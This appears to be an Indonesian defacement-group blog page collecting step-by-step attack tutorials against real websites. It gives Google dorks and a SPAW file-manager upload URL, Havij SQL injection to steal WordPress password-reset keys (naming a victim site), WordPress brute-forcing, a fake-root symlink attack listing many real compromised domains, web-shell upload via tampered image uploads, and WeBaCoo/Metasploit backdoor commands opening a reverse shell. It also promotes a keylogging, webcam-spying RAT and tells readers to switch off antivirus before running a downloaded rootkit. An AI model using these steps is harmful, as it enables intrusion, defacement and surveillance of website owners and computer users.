SubangCyberArmy
|SCA|
today : | at : | safemode : ON
> /Home/facebook /twitter /
name author perms com modified label

Cara Deface Website Melalui Spaw Uploads Vulnerability Axveez rwxr-xr-x 0 05:10

Filename Cara Deface Website Melalui Spaw Uploads Vulnerability
Permission rw-r--r--
Author Axveez
Date and Time 05:10
Label
Action
). Pertama, Masukan Dorknya :

inurl:”spaw2/uploads/files/”




http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p

Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkan site:th pada akhir dork diatas. Jadi hasilnya begini :

inurl:”spaw2/uploads/files/” site:th

Maksud dari site:th adalah domain negara asal website yang akan kita serang, "site:th" asal kata Thailand, jadi website yang akan kita serang semuanya website Thailand. Kalian juga bisa mengganti dengan domain negara lain, misalnya site:com.mysite:jpsite:gov.cn etc asal jangansite:co.id yah !

2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :

http://contoh.com/spaw2/uploads/files/




http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html


3). Ganti pada Bagian /spaw2/uploads/files/ dengan kode dibawah ini :



spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files




http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html


Sehingga Menjadi Seperti Ini :



http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file




http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html


4). Tekan Enter, Nanti akan Terbuka Seperti Ini :



http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html


5). Selanjutnya Liat Terus Gambar, Karena Tutorial ada Didalam Gambar.



http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html


6). Next, Pilih File Deface'an Sobat, Lalu klik Open dan Tunggu Hingga Loading Selesai.



http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html
7). Selanjutnya Klik Tombol Upload.
http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html
8). Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.
http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html
9). Selesai, dan Hasilnya :
http://hacker.website.org/





Mungkin orang mengira saya gila tutor, segampang ini harus diperjelas seperti ini. Tapi inilah saya, sosok yang tidak sempurna dan masih banyak kekurangan. Saya hanya ingin memperjelas kepada sobat semua agar sobat bisa mengerti dengan jelas.
Karena dari pengalaman saya dulu saat menjadi newbie ( Sekarang pun Masih Newbie ) susah sekali mencari tutor yang sangat mudah untuk dimengerti, cari sana-sini tapi hasil tetap 0.
Maka tujuan saya menulis tutorial ini biar sobat-sobat semua yang masih pemula ( Bukan saya sok, saya juga masih belajar ) dan masih belajar bisa mengerti.
Sekian Postingan saya kali ini tentang Cara Deface Website Melalui Spaw Uploads Vulnerability, semoga dapat bermanfaat bagi sobat semua.

Tutorial Hack Wordpress dengan Sql injection with Havij Axveez rwxr-xr-x 0 02:24

Filename Tutorial Hack Wordpress dengan Sql injection with Havij
Permission rw-r--r--
Author Axveez
Date and Time 02:24
Label
Action




Hack WordPress (SQL Injection + Reset Password) merupakan salah satu cara yang dapat kita gunakan untuk mendeface Blog WordPress. Okeh karena caranya disini lumayan panjang jadi gak usah basa-basi dulu deh langsung aja kita mulai
Pertama kita siapin dulu bahan-bahan yang dibutuhkan demi lancarnya aksi kita kali ini, hehe..
    1. Kompie terhubung internet
    2. Havij (maklum lammer jadi masih pake tool, yang dewa manual aja yah)
    3. dork: inurl:?fbconnect_action=myhome ( kreasi lagi yaa )
  1. Kesabaran dalam mencari target
  2. Kopi dan musik yang kuenceng ( disarankan alirannya Rock,Metal ) hehehe
saya beri contoh satu korban yaitu http://www.40sale.com/?fbconnect_action=myhome&userid=14 pada bagian “userid=” di tambahin tulisan ” fb” jadi bentuknya seperti ini http://www.40sale.com/?fbconnect_action=myhome&fbuserid=14
kalau udah scan dengan Havij dan cari tabel wp_user atau yang berhubungan dengan user lah,kalau udah ketemu caricolumn user_login dan user_activation_key
heheh…dah ketemu tuh yang kita cari,
username:pico
Activation key: GBasuGIZFtbUjpP3MvWb
sekarang kita gunakan exploitnya yaitu
wp-login.php?action=rp&key=“kode aktivasi”&login=“user login”
sampailah kita ke tahap me-reset password korban heheh,kalau udah direset kita tinggal login dan melakukan sekehendak kita
saya cukup ngedit home.php nya aja dah,hehehe
buseeeet hasilnya kelam banget dah…sory ya min

Cara Mudah Deface Wordpress Site Dengan WP Bruteforce Axveez rwxr-xr-x 0 01:20

Filename Cara Mudah Deface Wordpress Site Dengan WP Bruteforce
Permission rw-r--r--
Author Axveez
Date and Time 01:20
Label
Action
Salam Sobat,, ;)


Hajiahh,, dini hari kagak ngapa2in neh, ga bisa tidur :3 tapi ga apa apa dah, setidaknya bisa membuat Tutorial yang berguna buat sobat semua ^_^ langsung dah disimak yooo.. ;)

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Pertama Download Bahan-Bahannya:

WPBruteforce


Password: http://indocyberarmy.blogspot.com

Dork: inurl:/wp-login.php

Yup, saatnya kita beraksi.. :)

Live Target: http://live-target.pusku.com/

Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute



Lalu buka comand dengan cara : Klik Start>Run>ketik cmd


Biasanya posisi default directories di Cmd : C:\User\User_Name>
Ubah posisi directori dgn cara: ketik cd.. trus enter!

ex:
C:\User\User_Name>cd..
C:\User>cd..
C:\>
 Lalu  setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter! 



Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!


Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10



Lalu tekan enter!

Tunggu proses hingga selesai!



Wew! Berhasil tuh! wkwkwk Mantap! :p

Langsung Login dah!




GoodLuck!! :D

Artikel Aslinya :http://indocyberarmy.blogspot.com/2013/03/cara-mudah-deface-wordpress-site-dengan.html

Tutorial deface dengan Fake Root Axveez rwxr-xr-x 1 20:15

Filename Tutorial deface dengan Fake Root
Permission rw-r--r--
Author Axveez
Date and Time 20:15
Label
Action
Hallo sobat ... kali ini saya akan share., cara deface menggunakan fake root :)
Oke, disimak yah ^^
Pertama - tama kita harus punya bahan - bahan'a dulu ^^
- Web vuln anda bisa menggunakan teknik Exploit joomla , Exploit Wordpress , Config web vuln
-  Shell 1NJECTION anda bisa mendowload disini  Mirror : Shell Config killer <<Dowload>>
  NB : Shell 1NJ3CTION v3.3 <<Tanpa Login>>
Oke disimak yah :)
Pertama - tama kita harus punya web yang sudah ditanam shell..., 
Kira - kira tampilan akan seperti ini 
Klik 2x tombol menu symlink

contoh gambar dibawah :
Kalo udh akan muncul beberapa menu., Pilihlah menu Domain list
lalu klik 2x
Taraaaaaaaaaaaaaaaaaa., Muncul deh website - website yang 1 server sama web tadi..,
cara mengecek web tadi vuln fake root
copy salah satu url web yang satu server sama web tadi.
tambahkan ~root di belakang url web tadi.,
contoh : ww.site.com/~root/
maka jika hasil'a akan forbidden...., so., web tadi vuln fake root jika tidak berarti tidak vuln
Sooo...
kita tinggal mengetahui root web nya aja
Lihat gambar dibawah:

 cara melihat root webite cukup mudah :)
kalo anda sedang masuk shell "injection ., shell inject akan mempublikasikan semua tentang web tadi
dan folder yang kalian lihat
contoh folder : /home/sixwords/public_html/
jadi ROOT web tadi adalah : sixwords karena root selalu berada di tengah (antara home sama public_html)
kurang jelas ? Lihat gambar dibawah


Jika sudah , mari kita gabungkan (Web yang kita peroleh dari domain list)
Oiya sobat., sobat harus mengupload script sobat  ju'a di web tadi ,
tapi jika sobat mempaste di Index.php juga ga papa kok :)
cara mengakses jika mempaste di index.php :
www.webtadi.com/~rootweb/
cara mengakse jika mengupload script
NB : (Upload di public_html) :
www.webku.com/~rootweb/filemu.html
 Sudah paham kan sobat ?
contoh fake root :
http://artiszin.co.uk/~sixwords/ .
http://ashtonphotography.co.uk/~sixwords/ .
http://asianbusinessforum.com/~sixwords/ .
http://attualegraphics.com/~sixwords/ .
http://attualegraphics.it/~sixwords/ .
http://audienginesandgearboxes.co.uk/~sixwords/ .
http://autoleveller.co.uk/~sixwords/ .
http://automotiveairfilter.co.uk/~sixwords/ .
http://avesta.ltd.uk/~sixwords/ .
http://axisoflight.co.uk/~sixwords/ .
http://aylesburychoral.org.uk/~sixwords/ .
http://aylesburydeanery.org/~sixwords/ .
http://babtek.com/~sixwords/ .
http://badcreditloansforunemployed.org.uk/~sixwords/ .
http://badcreditpaydayloans.org.uk/~sixwords/ .
http://badcredittenantloans.org.uk/~sixwords/ .
http://bandaoke.co.uk/~sixwords/ .
http://bayleavesrestaurant.co.uk/~sixwords/ .
http://bdwebdesign.co.uk/~sixwords/ .
http://becomeacounselor.co.uk/~sixwords/ .
http://bernwodebenefice.com/~sixwords/ .
http://bespoke-education.com/~sixwords/ .
http://bestgaminglaptop.co.uk/~sixwords/ .
http://bestguarantorloansuk.co.uk/~sixwords/ .
http://bestiphone4sdeals.co.uk/~sixwords/ .
http://bestmotorhomes.co.uk/~sixwords/ .
http://bestnlessaccountants.co.uk/~sixwords/ .
http://bestonlineflashgames.net/~sixwords/ .
http://bestpersonalinjurylawyernyc.com/~sixwords/ .
http://bicestersweepers.co.uk/~sixwords/ .
dan masih banyak lagi :)

Cara menanam Shell Lewat Upload Image di Cms Korban Axveez rwxr-xr-x 0 02:56

Filename Cara menanam Shell Lewat Upload Image di Cms Korban
Permission rw-r--r--
Author Axveez
Date and Time 02:56
Label
Action
ane bakal Kasih tutor cara tanam shell a.k.a Backdoor a.k.a PintuBelakang a.k.a Lawang dapo di website yang sudah berhasil di dapatkan username and password adminnya....

Simak baik-baik dan jangan ada yang terlewat

Bahan
1. Browser Mozilla
2. Add on tamper Data
3. shell(saya menggunakan hn-shell)
4. Rokok sampurna(Malrboro Putih juga boleh)
5. Koneksi internet (Pastinya)

Tutor
1. Saya asumsikan anda sudah berhasil masuk ke halaman admin dan sekarang carilah tempat dimana anda bisa upload file seperti gambar di bawah ini

d sini saya mencari tempat upload gambar





2. Kita tinggalkan dulu sebentar browser dan kita lihat shell yang udah d siapkan tadi dan ganti ekstensi nya menjadi .jpeg/.jpg



3. sekarang kita balik lagi ke halaman admin terus klik browse dan pilih shell yang udah d rubah ekstensi tadi trus klik open

4. sekarang buka Add-On Tamper Data Tool>>tamper data dan klik start tamper dan klik Update

5. Setelah itu akan muncul pilihan dan pilih tamper



6. lalu akan muncul seperti gambar di bawah ini dan Copy script yang saya lingkari dan copy ke notepad terus cari nama shell yang agan upload tadi lalu hapus ekstensi .jpeg/.jpeg lalu Copas ke Tempat yang tadi Lalu Klik Ok dan Pilih Abort Request



7. Setelah semuanya selesai cari shell yang sudah anda upload tadi di websitenya lalu Copy link address ny dan buka di tab baru....

8. Selamat anda Sudah berhasil Tanam shell a.k.a Backdoor a.k.a PintuBelakang a.k.a lawang dapo

Membuat Backdoor dengan Webacoo dan Metaesploit Axveez rwxr-xr-x 0 02:47

Filename Membuat Backdoor dengan Webacoo dan Metaesploit
Permission rw-r--r--
Author Axveez
Date and Time 02:47
Label
Action

Dear Sobar Blogger, kali ini mas blaz mau sharing trik nih , yaitu Hack / Deface website menggunakan WeBaCoo, WeBaCoo adalah sebuah tools CLI (Command Line) yg menjadi penghubung http antara Attacker (Penyerang) dengan Web Server yang menjadi target kita, disertai dengan pembuatan Web Backdoor tools yg berbasis Perl ini juga memberikan module agar client dapat mengakses melalui metasploit.

sekarang mari kita lihat kronologinya.

Equipments:
1. WeBacoo
2. Metasploit

pada OS Kali Linux secara default webacoo bisa kita temukan di /usr/share/webacoo/

bagi yg belum ada tools ini silahkan download terlebih dahulu
# git clone https://github.com/anestisb/WeBaCoo.git
untuk lebih jelas nya silahkan lihat gambar ini sob :


selanjutnya kita memindahkan file 'msf_webacoo_module.rb' ke directory /usr/share/metasploit-framework/modules/eksploitasi/multi/http/

agar file tersebut dapat di akses menggunakan metasploit.
# cp /usr/share/webacoo/msf_webacoo_module.rb [b]/usr/share/metasploit-framework/modules/exploits/multi/http/[/b]
untuk lebih jelas lihat gambar :


selanjutnya kita cek apakah module tersebut siap di eksekusi:
# msfconsole -q
msf > search webacoo
terlihat pada gambar diatas, module webacoo siap jalankan dan sekarang tahap pembuatan Backdoor ala WeBacoo
# webacoo -g -o /tmp/webacoo.php
-g = generate backdoor
-o = output filename
/tmp/webacoo.php = saya menyimpannya di directory /tmp/ dengan nama webacoo.php

selanjutnya kita upload ke situs korban,
dan disini backdoor saya terletak di /wp-content/uploads/webacoo.php

selanjutnya kita kembali ke Metasploit untuk mengkoneksikan Client dengan WebServer target :
msf > use exploit/linux/http/msf_webacoo_module
msf exploit(msf_webacoo_module) > show payloads
msf exploit(msf_webacoo_module) > set PAYLOAD cmd/unix/reverse_perl
msf exploit(msf_webacoo_module) > set LHOST XXX.XXX.XXX
msf exploit(msf_webacoo_module) > set LPORT 4444
msf exploit(msf_webacoo_module) > set RHOST XXX.XXX.XXX.XXX or www.TARGET.com
msf exploit(msf_webacoo_module) > set URI /wp-content/uploads/webacoo.php
msf exploit(msf_webacoo_module) > check
msf exploit(msf_webacoo_module) > exploit
PAYLOAD = payload yang saya gunakan
LHOST and LPORT = IP-Address saya dan Port Listen saya
RHOST = Situs Target
URI = Letak dimana backdoor disimpan


terlihat diatas Command Shell 1 telah tebuka.
suksess.... sekarang kita bebas di situs korban
sedikit penjelasan, pada kenyataannya kita bisa langsung terhubung dengan server korban tanpa harus melalui Metasploit menggunakan perintah:
# webacoo -t -u http://www.TARGET.com/Path/Backdoor/backdoor.php
-t = Establish remote "terminal" connection
-u = Url Backdoor


remote administration tools (RAT) Axveez rwxr-xr-x 0 03:53

Filename remote administration tools (RAT)
Permission rw-r--r--
Author Axveez
Date and Time 03:53
Label
Action
Sharing sebuah tools yaitu remote administration tools (RAT) untuk windows, dimana aplikasi ini bisa berjalan di platform XP-Win8. Kemampuan tools Bozok ini cukup lumayan dimana dilengkapi dengan mematikan dan menghidupkan proses, mengatur services, keylogger dan webcam live capture.
Bozok RAT Latest - BinusHacker
Menu-menu dan fungsi-fungsi yang tersedia sebagai berikut:
  1. Filemanager:
      • Download/Upload File
      • Rename File
      • Delete File
      • Execute File
        • Hidden
        • Visible
      • Create Folder
    Bozok RAT - BinusHacker
    Bozok 1.0.1
  2. Processmanager
      • Terminate Process
    Bozok RAT - Screen - BinusHacker
    Bozok Screen
  3. Windowmanager
    • Close Window
    • Maximize/Minimize
  4. Servicemanager
    • Stop Service
    • Pause Service
    • Resume Service
    • Start Service
  5. Installation
    • Doesnt fire up UAC
    • Compitable with XP-Windows7 (both architectures)
    • Startup
    • Melt
    • Mutex Check
  6. Unicode compatible
Fitur lainnya:
    1. Remote Desktop
      • Control mouse/keyboad
    2. Keylogger
      • Bozok RAT - BinusHacker
        Bozok RAT – BinusHacker
    3. Webcam
      • Bozok RAT - BinusHacker
        Bozok RAT – BinusHacker

Lebih detail cara penggunaannya bisa dilihat di Video Tutorial Bozok RAT

Download Tools Selengkapnya:

Tutorial Deface Menggunakan Webdav Axveez rwxr-xr-x 1 03:50

Filename Tutorial Deface Menggunakan Webdav
Permission rw-r--r--
Author Axveez
Date and Time 03:50
Label
Action
Langsung aja yau…mungkin deface dengan Web Dav itu deface paling bawah alias gampang.
Saya akan memberikan tutor dan link download WebDav… Berhubung kebanyakan Hacker pemula menggunakan cara ini.. Jadi tidak usah khawatir akan kerusakan website.. Karena hanya halaman index saja yang di deface…
Download Files Berikut :
Download : Rootkit

Password  : cbf
Download : Shell

*NB: Tutup antivirus anda, kalau tidak antivirus akan detect rootkit sebagai virus.
Mungkin aplikasi Hmei7 ini terdeteksi Virus Rooit atau Malware tetapi sebenarnya pada aplikasi ini tidak mengandung virus… Saya sudah menyimpan aplikasi ini sekitar 2 minggu dan tidak terjadi apa-apa pada komputer saya sebaiknya matikan antivirus sebelum membuka aplikasi ini…
Deface menggunakan aplikasi ini adalah deface dalam bentuk asp, dan shellnnya sudah berada pada aplikasi ini jadi tidak usah memerlukan shell lain sperti b473k dan c99 tidak bisa digunakan untuk ini karena shell didalam adalah shell hanya untuk website ASP.
Nih ku kasih tutor dikit mengenai aplikasi ini :
1. Jalankan software nya..

2. Pilih WebDav >> ASP Shell Maker

3. Terus Klik Add Site >> Masukkan Website Target

4. Bila Berhasil akan ada penampakan seperti ini:

5. Terus hasilnya copas pada address bar.. Maka akan ada tampilan seperti ini..

6.Cari file Index atau apa saja lah yang bisa merubah tampilan website nya, edit / upload file tersebut dengan script halaman deface
Subscribe to: Posts (Atom)
 

SUBANG CYBER ARMY © 2014Subang Cyber Army |SCA|
Template design by |SCA|SUBANG